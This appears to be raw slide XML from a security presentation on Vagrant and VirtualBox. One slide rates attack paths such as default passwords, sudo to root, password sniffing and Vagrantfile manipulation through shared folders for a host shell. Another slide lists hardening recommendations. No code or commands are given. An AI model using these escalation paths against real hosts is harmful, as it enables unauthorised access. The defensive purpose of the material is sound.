                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Password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110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:latin typeface="DejaVu Sans Mono"/>
                <a:cs typeface="DejaVu Sans Mono"/>
              </a:rPr>
              <a:t>⋆⋆</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-11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302260" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="175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02895" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Default </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-130" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Password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110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:latin typeface="DejaVu Sans Mono"/>
                <a:cs typeface="DejaVu Sans Mono"/>
              </a:rPr>
              <a:t>⋆⋆</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-11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442595">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="175"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="150" baseline="13888" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Aroania"/>
                <a:cs typeface="Aroania"/>
              </a:rPr>
              <a:t>▶</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="187" baseline="13888" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Aroania"/>
                <a:cs typeface="Aroania"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Sudo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to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-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Root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-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-100" dirty="0">
                <a:latin typeface="DejaVu Sans Mono"/>
                <a:cs typeface="DejaVu Sans Mono"/>
              </a:rPr>
              <a:t>⋆</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-390" dirty="0">
                <a:latin typeface="DejaVu Sans Mono"/>
                <a:cs typeface="DejaVu Sans Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-105" dirty="0">
                <a:latin typeface="DejaVu Sans Mono"/>
                <a:cs typeface="DejaVu Sans Mono"/>
              </a:rPr>
              <a:t>⋆</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-385" dirty="0">
                <a:latin typeface="DejaVu Sans Mono"/>
                <a:cs typeface="DejaVu Sans Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-100" dirty="0">
                <a:latin typeface="DejaVu Sans Mono"/>
                <a:cs typeface="DejaVu Sans Mono"/>
              </a:rPr>
              <a:t>⋆</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-10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302260" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="550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02895" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Old </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Unpatched Software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110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:latin typeface="DejaVu Sans Mono"/>
                <a:cs typeface="DejaVu Sans Mono"/>
              </a:rPr>
              <a:t>⋆⋆</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-11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62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189" y="190436"/>
            <a:ext cx="3624579" cy="2606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THE SECURITY </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-229" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>EXPLOITATION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865"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="-100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Low/High </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-105" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Privilege </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-114" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> (Host)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</a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="60" baseline="6944" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Aroania"/>
                <a:cs typeface="Aroania"/>
              </a:rPr>
              <a:t>▶</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="127" baseline="6944" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Aroania"/>
                <a:cs typeface="Aroania"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="455295">
              <a:lnSpc>
                <a:spcPts val="1200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="175"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="150" baseline="13888" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Aroania"/>
                <a:cs typeface="Aroania"/>
              </a:rPr>
              <a:t>▶ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Password </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-70" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Sniffing*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95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-95" dirty="0">
                <a:latin typeface="DejaVu Sans Mono"/>
                <a:cs typeface="DejaVu Sans Mono"/>
              </a:rPr>
              <a:t>⋆</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-9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455295">
              <a:lnSpc>
                <a:spcPts val="1195"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="150" baseline="13888" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Aroania"/>
                <a:cs typeface="Aroania"/>
              </a:rPr>
              <a:t>▶ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Discover </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>other </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Boxes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0" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-100" dirty="0">
                <a:latin typeface="DejaVu Sans Mono"/>
                <a:cs typeface="DejaVu Sans Mono"/>
              </a:rPr>
              <a:t>⋆⋆</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-10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455295">
              <a:lnSpc>
                <a:spcPts val="1195"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="150" baseline="13888" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Aroania"/>
                <a:cs typeface="Aroania"/>
              </a:rPr>
              <a:t>▶ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Discover </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Services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100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-100" dirty="0">
                <a:latin typeface="DejaVu Sans Mono"/>
                <a:cs typeface="DejaVu Sans Mono"/>
              </a:rPr>
              <a:t>⋆⋆</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-10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455295">
              <a:lnSpc>
                <a:spcPts val="1200"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="150" baseline="13888" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Aroania"/>
                <a:cs typeface="Aroania"/>
              </a:rPr>
              <a:t>▶</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="195" baseline="13888" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Aroania"/>
                <a:cs typeface="Aroania"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-85" dirty="0"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395"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="60" baseline="6944" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Aroania"/>
                <a:cs typeface="Aroania"/>
              </a:rPr>
              <a:t>▶ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-125" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Shared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Folder</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="455295">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="170"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="150" baseline="13888" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Aroania"/>
                <a:cs typeface="Aroania"/>
              </a:rPr>
              <a:t>▶ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Manipulate </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-70" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vagrantfile**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100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-100" dirty="0">
                <a:latin typeface="DejaVu Sans Mono"/>
                <a:cs typeface="DejaVu Sans Mono"/>
              </a:rPr>
              <a:t>⋆⋆</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-10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900" spc="-40" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>*) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Only </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Works </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-120" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Public </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Network Is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5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Used.</a:t>
            </a:r>
            <a:endParaRPr sz="9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75"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-25" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>**) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>High </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Privilege </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Shell </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-120" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Local </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Host </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>User </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Allows </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Sudo </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>And </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Sudo-Session </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Is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spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Active.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63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190436"/>
            <a:ext cx="2745740" cy="2815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THE SECURITY </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-235" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-165" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:rPr>
              <a:t>RECOMMENDATIONS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50165">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="865"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="-130" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Recommendations </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>running</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074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E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>VirtualBox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327660" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="E20074"/>
              </a:buClr>
              <a:buSzPct val="72727"/>
              <a:buFont typeface="Aroania"/>
              <a:buChar char="▶"/>
              <a:tabLst>
                <a:tab pos="328295" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-130" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Keep </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Software </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-135" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Up </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-13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25" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Date</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="467995">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="150" baseline="13888" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Aroania"/>
                <a:cs typeface="Aroania"/>
              </a:rPr>
              <a:t>▶ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Update </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>VirtualBox </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-100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000" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Guest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Additions</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="327660" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="484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28295" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Restrict </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Network </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-120" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Access </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to Critical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120" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Services</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="327660" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="135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28295" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Follow </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Principle </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-120" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Least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Privilege</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="467995">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="150" baseline="13888" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Aroania"/>
                <a:cs typeface="Aroania"/>
              </a:rPr>
              <a:t>▶ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-125" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Do </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>not run </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>VirtualBox </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-120" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>as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root.</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="327660" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="330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28295" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Monitor </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-140" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>System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Activity</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="105410" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="145"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="150" baseline="13888" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Aroania"/>
                <a:cs typeface="Aroania"/>
              </a:rPr>
              <a:t>▶ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Update </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>VirtualBox </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-114" dirty="0">
